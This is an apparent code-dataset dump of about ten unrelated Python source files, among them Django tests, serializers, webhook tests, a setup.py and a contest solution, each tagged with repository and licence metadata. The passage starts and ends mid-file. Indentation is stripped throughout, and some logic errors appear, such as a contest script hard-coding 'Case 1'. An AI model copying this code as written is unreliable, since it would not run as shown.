self.assertEqual(Gene.objects.count(), expected_counts['genes'])
self.assertEqual(Transcript.objects.count(),
expected_counts['transcripts'])
self.assertEqual(VariantEffect.objects.count(),
expected_counts['variant_effects'])
self.assertEqual(Sift.objects.count(), 0)
self.assertEqual(PolyPhen2.objects.count(), 0)
self.assertEqual(ThousandG.objects.count(), 0)
self.assertEqual(EVS.objects.count(), 0)
# Results loaded..
self.assertEqual(Result.objects.count(), expected_counts['results'])
# Batches are now published..
self.assertEqual(Batch.objects.filter(published=True).count(),
expected_counts['batches'])
# Ensure the counts are accurate for each sample..
for ec in expected_counts['results_per_sample']:
sample = Sample.objects.get(name=ec['sample'],
batch__name=ec['batch'])
self.assertTrue(sample.published)
self.assertEqual(sample.count, ec['count'])
# Batches are created with the samples, but are unpublished
for pk, count in expected_counts['samples_per_batch']:
batch = Batch.objects.get(pk=pk)
self.assertTrue(batch.published)
self.assertEqual(batch.count, count)
# Ensure the state changes were logged..
system = System.get(Sample.objects.all()[0])
self.assertEqual(len(system), 3)
@override_settings(VDW_GENOME_VERSION='hg18')
def test_wrong_genome_version(self):
# Immediately validates and creates a sample.
management.call_command('samples', 'queue')
# Synchronously work on queue.
worker1 = get_worker('variants')
worker2 = get_worker('default')
# Work on variants.
worker1.work(burst=True)
# Work on effects.
worker2.work(burst=True)
# Since the genome version was required but does not match any of the
# versions specified in the MANIFESTs, we should have no data.
self.assertEqual(Variant.objects.count(), 0)
self.assertEqual(Result.objects.count(), 0)
self.assertEqual(Sample.objects.count(), 0)
self.assertEqual(Cohort.objects.count(), 0)
self.assertEqual(Batch.objects.count(), 0)
self.assertEqual(Project.objects.count(), 0)
class SnpeffReloadTest(QueueTestCase):
def test(self):
"Load a single VCF, reload the snpEff data using the same VCF."
management.call_command('samples', 'queue',
os.path.join(SAMPLE_DIRS[0], 'batch1/locus_1'),
startworkers=True)
expected_variant_effects_count = 5426
self.assertEqual(VariantEffect.objects.count(),
expected_variant_effects_count)
self.assertEqual(
VariantEffect.objects.aggregate(max_id=Max('id'))['max_id'],
expected_variant_effects_count)
management.call_command('variants', 'reload-snpeff',
os.path.join(SAMPLE_DIRS[0],
'batch1/locus_1/locus_1.vcf'))
# Ensure data was actually reloaded, check the auto-incremented key
self.assertEqual(VariantEffect.objects.count(),
expected_variant_effects_count)
# Since we reloaded, we should now have double the number of expected
# results, thus the 2 * operation in the assertion below.
self.assertEqual(
VariantEffect.objects.aggregate(max_id=Max('id'))['max_id'],
2 * expected_variant_effects_count)
|
chop-dbhi/varify-data-warehouse
|
tests/cases/sample_load_process/tests.py
|
Python
|
bsd-2-clause
| 7,802
|
from django.contrib.contenttypes.models import ContentType
from django.db import transaction
from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from extras.models import CF_TYPE_SELECT, CustomField, CustomFieldChoice, CustomFieldValue
#
# Custom fields
#
class CustomFieldsSerializer(serializers.BaseSerializer):
def to_representation(self, obj):
return obj
def to_internal_value(self, data):
content_type = ContentType.objects.get_for_model(self.parent.Meta.model)
custom_fields = {field.name: field for field in CustomField.objects.filter(obj_type=content_type)}
for field_name, value in data.items():
# Validate custom field name
if field_name not in custom_fields:
raise ValidationError(u"Invalid custom field for {} objects: {}".format(content_type, field_name))
# Validate selected choice
cf = custom_fields[field_name]
if cf.type == CF_TYPE_SELECT:
valid_choices = [c.pk for c in cf.choices.all()]
if value not in valid_choices:
raise ValidationError(u"Invalid choice ({}) for field {}".format(value, field_name))
# Check for missing required fields
missing_fields = []
for field_name, field in custom_fields.items():
if field.required and field_name not in data:
missing_fields.append(field_name)
if missing_fields:
raise ValidationError(u"Missing required fields: {}".format(u", ".join(missing_fields)))
return data
class CustomFieldModelSerializer(serializers.ModelSerializer):
"""
Extends ModelSerializer to render any CustomFields and their values associated with an object.
"""
custom_fields = CustomFieldsSerializer(required=False)
def __init__(self, *args, **kwargs):
def _populate_custom_fields(instance, fields):
custom_fields = {f.name: None for f in fields}
for cfv in instance.custom_field_values.all():
if cfv.field.type == CF_TYPE_SELECT:
custom_fields[cfv.field.name] = CustomFieldChoiceSerializer(cfv.value).data
else:
custom_fields[cfv.field.name] = cfv.value
instance.custom_fields = custom_fields
super(CustomFieldModelSerializer, self).__init__(*args, **kwargs)
if self.instance is not None:
# Retrieve the set of CustomFields which apply to this type of object
content_type = ContentType.objects.get_for_model(self.Meta.model)
fields = CustomField.objects.filter(obj_type=content_type)
# Populate CustomFieldValues for each instance from database
try:
for obj in self.instance:
_populate_custom_fields(obj, fields)
except TypeError:
_populate_custom_fields(self.instance, fields)
def _save_custom_fields(self, instance, custom_fields):
content_type = ContentType.objects.get_for_model(self.Meta.model)
for field_name, value in custom_fields.items():
custom_field = CustomField.objects.get(name=field_name)
CustomFieldValue.objects.update_or_create(
field=custom_field,
obj_type=content_type,
obj_id=instance.pk,
defaults={'serialized_value': value},
)
def create(self, validated_data):
custom_fields = validated_data.pop('custom_fields', None)
with transaction.atomic():
instance = super(CustomFieldModelSerializer, self).create(validated_data)
# Save custom fields
if custom_fields is not None:
self._save_custom_fields(instance, custom_fields)
instance.custom_fields = custom_fields
return instance
def update(self, instance, validated_data):
custom_fields = validated_data.pop('custom_fields', None)
with transaction.atomic():
instance = super(CustomFieldModelSerializer, self).update(instance, validated_data)
# Save custom fields
if custom_fields is not None:
self._save_custom_fields(instance, custom_fields)
instance.custom_fields = custom_fields
return instance
class CustomFieldChoiceSerializer(serializers.ModelSerializer):
"""
Imitate utilities.api.ChoiceFieldSerializer
"""
value = serializers.IntegerField(source='pk')
label = serializers.CharField(source='value')
class Meta:
model = CustomFieldChoice
fields = ['value', 'label']
|
Alphalink/netbox
|
netbox/extras/api/customfields.py
|
Python
|
apache-2.0
| 4,728
|
"""
Feature agglomeration. Base classes and functions for performing feature
agglomeration.
"""
# Author: V. Michel, A. Gramfort
# License: BSD 3 clause
import numpy as np
from ..base import TransformerMixin
from ..utils import array2d
###############################################################################
# Mixin class for feature agglomeration.
class AgglomerationTransform(TransformerMixin):
"""
A class for feature agglomeration via the transform interface
"""
def transform(self, X, pooling_func=np.mean):
"""
Transform a new matrix using the built clustering
Parameters
---------
X : array-like, shape = [n_samples, n_features]
A M by N array of M observations in N dimensions or a length
M array of M one-dimensional observations.
pooling_func : a function that takes an array of shape = [M, N] and
return an array of value of size M.
Defaut is np.mean
"""
X = array2d(X)
nX = []
if len(self.labels_) != X.shape[1]:
raise ValueError("X has a different number of features than "
"during fitting.")
for l in np.unique(self.labels_):
nX.append(pooling_func(X[:, self.labels_ == l], axis=1))
return np.array(nX).T
def inverse_transform(self, Xred):
"""
Inverse the transformation.
Return a vector of size nb_features with the values of Xred assigned
to each group of features
Parameters
----------
Xred : array of size k
The values to be assigned to each cluster of samples
Returns
-------
X : array of size nb_samples
A vector of size nb_samples with the values of Xred assigned to
each of the cluster of samples.
"""
if np.size((Xred.shape)) == 1:
X = np.zeros([self.labels_.shape[0]])
else:
X = np.zeros([Xred.shape[0], self.labels_.shape[0]])
unil = np.unique(self.labels_)
for i in range(len(unil)):
if np.size((Xred.shape)) == 1:
X[self.labels_ == unil[i]] = Xred[i]
else:
X[:, self.labels_ == unil[i]] = array2d(Xred[:, i]).T
return X
|
florian-f/sklearn
|
sklearn/cluster/_feature_agglomeration.py
|
Python
|
bsd-3-clause
| 2,350
|
T = int(raw_input())
for i in range (0, T):
number = int(raw_input())
if number == 1:
print "Case 1: 1"
continue
remain = number % 8
quotient = int(number / 8)
displacement = quotient*8 - quotient
if remain == 0 :
print "Case " + str((i+1)) + ": Not Cube Free"
else:
print "Case " + str((i+1)) + ": " + str(displacement + remain)
|
prabodhprakash/problemsolving
|
spoj/CUBEFR.py
|
Python
|
mit
| 348
|
# In routing.py
from channels.routing import route
from .consumers import ws_connect, ws_receive, ws_disconnect
channel_routing = {
'websocket.connect': ws_connect,
'websocket.receive': ws_receive,
'websocket.disconnect': ws_disconnect,
}
|
Petrole/MaturePyRobots
|
WebPyRobot/backend/routing.py
|
Python
|
gpl-3.0
| 253
|
# Copyright 2014 Roberto Brian Sarrionandia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import webapp2
import jinja2
import os
from google.appengine.ext import ndb
import tusers
from forms import JudgeForm, TeamForm
from models import RegisteredOpenTeam, InstitutionTeam, RegisteredIndependentJudge, InstitutionJudge
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class JudgeHandler(webapp2.RequestHandler):
def get(self):
user = tusers.get_current_user()
form = JudgeForm()
j = self.request.get('j')
j_key = ndb.Key(urlsafe=j)
judge = j_key.get()
reg = None
institution = None
if judge.authorised(user):
form.name.data = judge.name
form.cv.data = judge.cv
if isinstance(judge, InstitutionJudge):
institution = j_key.parent().get()
t = j_key.parent().parent().parent().get()
form.phone.data = institution.phone
reg = j_key.parent().parent().get()
elif isinstance(judge, RegisteredIndependentJudge):
reg = j_key.parent().get()
form.phone.data = judge.phone
t = reg.key.parent().get()
template_values = {
'user' : user,
't' : t,
'logout' : tusers.create_logout_url('/'),
'login' : tusers.create_login_url('/mod/judge?j=' + j),
'r' : reg,
'form' : form,
'j' : j_key.urlsafe(),
'institution' : institution
}
template = JINJA_ENVIRONMENT.get_template('view/modjudge.html')
self.response.write(template.render(template_values))
return
else:
self.redirect(self.request.referer)
def post(self):
user = tusers.get_current_user()
form = JudgeForm(self.request.POST)
j = self.request.get('j')
j_key = ndb.Key(urlsafe=j)
judge = j_key.get()
reg = None
institution = None
if judge.authorised(user):
if isinstance(judge, InstitutionJudge):
institution = j_key.parent().get()
reg = institution.key.parent().get()
form.phone.data = institution.phone
elif isinstance(judge, RegisteredIndependentJudge):
reg = j_key.parent().get()
t = reg.key.parent().get()
if (form.validate()):
judge.name = form.name.data
judge.phone = form.phone.data
judge.cv = form.cv.data
judge.put()
self.redirect('/reg_control?t=' + str(t.key.id()))
else:
template_values = {
'user' : user,
't' : t,
'logout' : tusers.create_logout_url('/'),
'login' : tusers.create_login_url('/mod/judge?j=' + j),
'r' : reg,
'form' : form,
'institution' : institution,
}
template = JINJA_ENVIRONMENT.get_template('view/modjudge.html')
self.response.write(template.render(template_values))
else:
self.redirect(self.request.referer)
#Handles the modification of teams
class TeamHandler(webapp2.RequestHandler):
def get(self):
user = tusers.get_current_user()
form = TeamForm()
t_string = self.request.get('t')
t_key = ndb.Key(urlsafe=t_string)
team = t_key.get()
t = None
reg = None
if team.authorised(user):
form.teamName.data = team.teamName
form.sp1Name.data = team.sp1Name
form.sp2Name.data = team.sp2Name
form.sp1ESL.data = team.sp1ESL
form.sp1Novice.data = team.sp1Novice
form.sp2ESL.data = team.sp2ESL
form.sp2Novice.data = team.sp2ESL
institution = None
if isinstance(team, RegisteredOpenTeam ):
reg = t_key.parent().get()
elif isinstance(team, InstitutionTeam):
institution = team.key.parent().get()
form.leadName.data = institution.leadName
form.phone.data = institution.phone
reg = t_key.parent().parent().get()
t = reg.key.parent().get()
template_values = {
'user' : user,
'logout' : tusers.create_logout_url('/'),
'login' : tusers.create_login_url('/mod/team?t=' + t_string),
'r' : reg,
't' : t,
'form' : form,
'institution' : institution,
'team' : t_key.urlsafe()
}
template = JINJA_ENVIRONMENT.get_template('view/modteam.html')
self.response.write(template.render(template_values))
return
else:
self.redirect(self.request.referer)
def post(self):
user = tusers.get_current_user()
form = TeamForm(self.request.POST)
t_string = self.request.get('t')
t_key = ndb.Key(urlsafe=t_string)
team = t_key.get()
institution = None
t = None
# If it is an institutional team, don't let them update the contact info
# with this method, as that data belongs to the Institution
if (isinstance(team, InstitutionTeam)):
institution = team.key.parent().get()
form.leadName.data = institution.leadName
form.phone.data = institution.phone
reg = institution.key.parent().get()
elif (isinstance(team, RegisteredOpenTeam)):
reg = t_key.parent().get()
t = reg.key.parent().get()
#Check if they are allowed to edit
if team.authorised(user):
#If valid, update the team object
if (form.validate()):
team.leadName = form.leadName.data
team.phone = form.phone.data
team.teamName = form.teamName.data
team.sp1Name = form.sp1Name.data
team.sp2Name = form.sp2Name.data
team.sp1ESL = form.sp1ESL.data
team.sp2ESL = form.sp2ESL.data
team.sp1Novice = form.sp1Novice.data
team.sp2Novice = form.sp2Novice.data
team.put()
self.redirect('/reg_control?t=' + str(t.key.id()))
else:
template_values = {
'user' : user,
't' : t,
'logout' : tusers.create_logout_url('/'),
'login' : tusers.create_login_url('/mod/team?j=' + t_key.urlsafe()),
'r' : reg,
'form' : form,
'team' : t_key.urlsafe(),
'institution' : institution
}
template = JINJA_ENVIRONMENT.get_template('view/modteam.html')
self.response.write(template.render(template_values))
else:
self.redirect(self.request.referer)
app = webapp2.WSGIApplication([
('/mod/judge', JudgeHandler),
('/mod/team', TeamHandler)
], debug=True)
|
sarrionandia/tournatrack
|
modify.py
|
Python
|
apache-2.0
| 6,380
|
from .kb import * # pragma: no flakes
EXTRA_APP_CARDS = ['kolibri']
|
ideascube/ideascube
|
ideascube/conf/kb_bdi_unicefplay.py
|
Python
|
agpl-3.0
| 71
|
"""Utility functions for sending slack messages"""
# Django
from django.conf import settings
def format_user(user):
"""Format a user for inclusion in a Slack notification"""
return "<%(url)s|%(name)s>" % {
"url": settings.MUCKROCK_URL + user.get_absolute_url(),
"name": user.profile.full_name,
}
def slack_message(icon, channel, text, attachments):
"""Formats and returns data in a Slack message format."""
return {
"icon_emoji": icon,
"channel": channel,
"text": text,
"attachments": attachments,
}
def slack_attachment(field_title, field_value, field_short=True):
"""Formats and returns data in in the Slack attachment format."""
return {"title": field_title, "value": field_value, "short": field_short}
|
MuckRock/muckrock
|
muckrock/message/utils.py
|
Python
|
agpl-3.0
| 793
|
#!/usr/bin/env python
import os
import platform
import shutil
import sys
from distutils.command.config import config as _config
from subprocess import check_output
from typing import List
from setuptools import Command, find_packages, setup
from setuptools.command.build_ext import build_ext as _build_ext
from setuptools.extension import Extension
import versioneer
class config(_config):
def run(self) -> None:
from bn_config import create_config_h
create_config_h(self)
class clean(Command):
user_options = [("all", "a", "")]
def initialize_options(self) -> None:
self.all = True
self.delete_dirs = []
self.delete_files = []
for root, dirs, files in os.walk("bottleneck"):
for d in dirs:
if d == "__pycache__":
self.delete_dirs.append(os.path.join(root, d))
if "__pycache__" in root:
continue
for f in files:
if f.endswith(".pyc") or f.endswith(".so"):
self.delete_files.append(os.path.join(root, f))
if f.endswith(".c") and "template" in f:
generated_file = os.path.join(root, f.replace("_template", ""))
if os.path.exists(generated_file):
self.delete_files.append(generated_file)
config_h = "bottleneck/include/bn_config.h"
if os.path.exists(config_h):
self.delete_files.append(config_h)
if os.path.exists("build"):
self.delete_dirs.append("build")
def finalize_options(self) -> None:
pass
def run(self) -> None:
for delete_dir in self.delete_dirs:
shutil.rmtree(delete_dir)
for delete_file in self.delete_files:
os.unlink(delete_file)
# workaround for installing bottleneck when numpy is not present
class build_ext(_build_ext):
# taken from: stackoverflow.com/questions/19919905/
# how-to-bootstrap-numpy-installation-in-setup-py#21621689
def finalize_options(self) -> None:
_build_ext.finalize_options(self)
# prevent numpy from thinking it is still in its setup process
if sys.version_info < (3,):
import __builtin__ as builtins
else:
import builtins
builtins.__NUMPY_SETUP__ = False
import numpy
# place numpy includes first, see gh #156
self.include_dirs.insert(0, numpy.get_include())
self.include_dirs.append("bottleneck/src")
self.include_dirs.append("bottleneck/include")
def build_extensions(self) -> None:
from bn_template import make_c_files
self.run_command("config")
make_c_files()
_build_ext.build_extensions(self)
cmdclass = versioneer.get_cmdclass()
cmdclass["build_ext"] = build_ext
cmdclass["clean"] = clean
cmdclass["config"] = config
def is_old_gcc() -> bool:
if sys.platform != "win32":
gcc_version = check_output(["gcc", "-dumpversion"]).decode("utf8").split(".")[0]
if int(gcc_version) < 5:
return True
return False
IS_OLD_GCC = is_old_gcc()
DEFAULT_FLAGS = ["-O2"]
if IS_OLD_GCC:
DEFAULT_FLAGS.append("-std=gnu11")
# Add our template path to the path so that we don't have a circular reference
# of working install to be able to re-compile
sys.path.append(os.path.join(os.path.dirname(__file__), "bottleneck/src"))
def get_cpu_arch_flags() -> List[str]:
if platform.processor() == "ppc64le":
# Needed to support SSE2 intrinsics
return ["-DNO_WARN_X86_INTRINSICS"]
else:
return []
def prepare_modules() -> List[Extension]:
base_includes = [
"bottleneck/include/bottleneck.h",
"bottleneck/include/bn_config.h",
"bottleneck/include/iterators.h",
]
arch_flags = get_cpu_arch_flags()
ext = [
Extension(
"bottleneck.reduce",
sources=["bottleneck/src/reduce.c"],
depends=base_includes,
extra_compile_args=DEFAULT_FLAGS + arch_flags,
)
]
ext += [
Extension(
"bottleneck.move",
sources=[
"bottleneck/src/move.c",
"bottleneck/src/move_median/move_median.c",
],
depends=base_includes + ["bottleneck/src/move_median/move_median.h"],
extra_compile_args=DEFAULT_FLAGS + arch_flags,
)
]
ext += [
Extension(
"bottleneck.nonreduce",
sources=["bottleneck/src/nonreduce.c"],
depends=base_includes,
extra_compile_args=DEFAULT_FLAGS + arch_flags,
)
]
ext += [
Extension(
"bottleneck.nonreduce_axis",
sources=["bottleneck/src/nonreduce_axis.c"],
depends=base_includes,
extra_compile_args=DEFAULT_FLAGS + arch_flags,
)
]
return ext
def get_long_description() -> str:
with open("README.rst", "r") as fid:
long_description = fid.read()
idx = max(0, long_description.find("Bottleneck is a collection"))
long_description = long_description[idx:]
return long_description
CLASSIFIERS = [
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Science/Research",
"Intended Audience :: Financial and Insurance Industry",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: C",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering",
]
metadata = dict(
name="Bottleneck",
maintainer="Christopher Whelan",
maintainer_email="bottle-neck@googlegroups.com",
description="Fast NumPy array functions written in C",
long_description=get_long_description(),
long_description_content_type="text/x-rst",
url="https://github.com/pydata/bottleneck",
download_url="http://pypi.python.org/pypi/Bottleneck",
license="Simplified BSD",
classifiers=CLASSIFIERS,
platforms="OS Independent",
version=versioneer.get_version(),
packages=find_packages(),
package_data={"bottleneck": ["LICENSE", "tests/data/**/*.c"]},
install_requires=["numpy"],
extras_require={
"doc": ["numpydoc", "sphinx", "gitpython"],
"test": ["hypothesis", "pytest"],
},
cmdclass=cmdclass,
setup_requires=["numpy"],
ext_modules=prepare_modules(),
python_requires=">=3.6",
zip_safe=False,
)
setup(**metadata)
|
kwgoodman/bottleneck
|
setup.py
|
Python
|
bsd-2-clause
| 6,752
|
import ujson
from mock import patch, MagicMock
from typing import Dict, Optional, Text
from zerver.models import Message
from zerver.lib.webhooks.git import COMMITS_LIMIT
from zerver.lib.test_classes import WebhookTestCase
class GithubWebhookTest(WebhookTestCase):
STREAM_NAME = 'github'
URL_TEMPLATE = "/api/v1/external/github?stream={stream}&api_key={api_key}"
FIXTURE_DIR_NAME = 'github_webhook'
EXPECTED_SUBJECT_REPO_EVENTS = u"public-repo"
EXPECTED_SUBJECT_ISSUE_EVENTS = u"public-repo / Issue #2 Spelling error in the README file"
EXPECTED_SUBJECT_PR_EVENTS = u"public-repo / PR #1 Update the README with new information"
EXPECTED_SUBJECT_DEPLOYMENT_EVENTS = u"public-repo / Deployment on production"
EXPECTED_SUBJECT_ORGANIZATION_EVENTS = u"baxterandthehackers organization"
EXPECTED_SUBJECT_BRANCH_EVENTS = u"public-repo / changes"
EXPECTED_SUBJECT_WIKI_EVENTS = u"public-repo / Wiki Pages"
def test_ping_event(self):
# type: () -> None
expected_message = u"GitHub webhook has been successfully configured by TomaszKolek"
self.send_and_test_stream_message('ping', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='ping')
def test_ping_organization_event(self):
# type: () -> None
expected_message = u"GitHub webhook has been successfully configured by eeshangarg"
self.send_and_test_stream_message('ping_organization', 'zulip-test-org', expected_message, HTTP_X_GITHUB_EVENT='ping')
def test_push_delete_branch(self):
# type: () -> None
expected_message = u"eeshangarg [deleted](https://github.com/eeshangarg/public-repo/compare/2e8cf535fb38...000000000000) the branch feature."
self.send_and_test_stream_message('push_delete_branch', u"public-repo / feature", expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_local_branch_without_commits(self):
# type: () -> None
expected_message = u"eeshangarg [pushed](https://github.com/eeshangarg/public-repo/compare/feature) the branch feature."
self.send_and_test_stream_message('push_local_branch_without_commits', u"public-repo / feature", expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_1_commit(self):
# type: () -> None
expected_message = u"baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 1 commit to branch changes.\n\n* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))"
self.send_and_test_stream_message('push_1_commit', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_1_commit_without_username(self):
# type: () -> None
expected_message = u"eeshangarg [pushed](https://github.com/eeshangarg/public-repo/compare/0383613da871...2e8cf535fb38) 1 commit to branch changes. Commits by John Snow (1).\n\n* Update the README ([2e8cf53](https://github.com/eeshangarg/public-repo/commit/2e8cf535fb38a3dab2476cdf856efda904ad4c94))"
self.send_and_test_stream_message('push_1_commit_without_username', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_1_commit_filtered_by_branches(self):
# type: () -> None
self.url = self.build_webhook_url('master,changes')
expected_message = u"baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 1 commit to branch changes.\n\n* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))"
self.send_and_test_stream_message('push_1_commit', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_multiple_comitters(self):
# type: () -> None
commits_info = u'* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n'
expected_message = u"""baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 6 commits to branch changes. Commits by Tomasz (3), Ben (2) and baxterthehacker (1).\n\n{}* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))""".format(commits_info * 5)
self.send_and_test_stream_message('push_multiple_committers', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_multiple_comitters_with_others(self):
# type: () -> None
commits_info = u'* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n'
expected_message = u"""baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 10 commits to branch changes. Commits by Tomasz (4), Ben (3), James (2) and others (1).\n\n{}* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))""".format(commits_info * 9)
self.send_and_test_stream_message('push_multiple_committers_with_others', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_multiple_comitters_filtered_by_branches(self):
# type: () -> None
self.url = self.build_webhook_url('master,changes')
commits_info = u'* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n'
expected_message = u"""baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 6 commits to branch changes. Commits by Tomasz (3), Ben (2) and baxterthehacker (1).\n\n{}* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))""".format(commits_info * 5)
self.send_and_test_stream_message('push_multiple_committers', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_multiple_comitters_with_others_filtered_by_branches(self):
# type: () -> None
self.url = self.build_webhook_url('master,changes')
commits_info = u'* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n'
expected_message = u"""baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 10 commits to branch changes. Commits by Tomasz (4), Ben (3), James (2) and others (1).\n\n{}* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))""".format(commits_info * 9)
self.send_and_test_stream_message('push_multiple_committers_with_others', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_50_commits(self):
# type: () -> None
commit_info = "* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n"
expected_message = u"baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 50 commits to branch changes.\n\n{}[and 30 more commit(s)]".format(
commit_info * COMMITS_LIMIT
)
self.send_and_test_stream_message('push_50_commits', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_50_commits_filtered_by_branches(self):
# type: () -> None
self.url = self.build_webhook_url(branches='master,changes')
commit_info = "* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n"
expected_message = u"baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 50 commits to branch changes.\n\n{}[and 30 more commit(s)]".format(
commit_info * COMMITS_LIMIT
)
self.send_and_test_stream_message('push_50_commits', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_commit_comment_msg(self):
# type: () -> None
expected_message = u"baxterthehacker [commented](https://github.com/baxterthehacker/public-repo/commit/9049f1265b7d61be4a8904a9a27120d2064dab3b#commitcomment-11056394) on [9049f12](https://github.com/baxterthehacker/public-repo/commit/9049f1265b7d61be4a8904a9a27120d2064dab3b)\n~~~ quote\nThis is a really good change! :+1:\n~~~"
self.send_and_test_stream_message('commit_comment', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='commit_comment')
def test_create_msg(self):
# type: () -> None
expected_message = u"baxterthehacker created tag 0.0.1"
self.send_and_test_stream_message('create', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='create')
def test_delete_msg(self):
# type: () -> None
expected_message = u"baxterthehacker deleted tag simple-tag"
self.send_and_test_stream_message('delete', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='delete')
def test_deployment_msg(self):
# type: () -> None
expected_message = u"baxterthehacker created new deployment"
self.send_and_test_stream_message('deployment', self.EXPECTED_SUBJECT_DEPLOYMENT_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='deployment')
def test_deployment_status_msg(self):
# type: () -> None
expected_message = u"Deployment changed status to success"
self.send_and_test_stream_message('deployment_status', self.EXPECTED_SUBJECT_DEPLOYMENT_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='deployment_status')
def test_fork_msg(self):
# type: () -> None
expected_message = u"baxterandthehackers forked [public-repo](https://github.com/baxterandthehackers/public-repo)"
self.send_and_test_stream_message('fork', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='fork')
def test_issue_comment_msg(self):
# type: () -> None
expected_message = u"baxterthehacker [commented](https://github.com/baxterthehacker/public-repo/issues/2#issuecomment-99262140) on [Issue #2](https://github.com/baxterthehacker/public-repo/issues/2)\n\n~~~ quote\nYou are totally right! I'll get this fixed right away.\n~~~"
self.send_and_test_stream_message('issue_comment', self.EXPECTED_SUBJECT_ISSUE_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='issue_comment')
def test_issue_msg(self):
# type: () -> None
expected_message = u"baxterthehacker opened [Issue #2](https://github.com/baxterthehacker/public-repo/issues/2)\n\n~~~ quote\nIt looks like you accidently spelled 'commit' with two 't's.\n~~~"
self.send_and_test_stream_message('issue', self.EXPECTED_SUBJECT_ISSUE_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='issues')
def test_membership_msg(self):
# type: () -> None
expected_message = u"baxterthehacker added [kdaigle](https://github.com/kdaigle) to Contractors team"
self.send_and_test_stream_message('membership', self.EXPECTED_SUBJECT_ORGANIZATION_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='membership')
def test_member_msg(self):
# type: () -> None
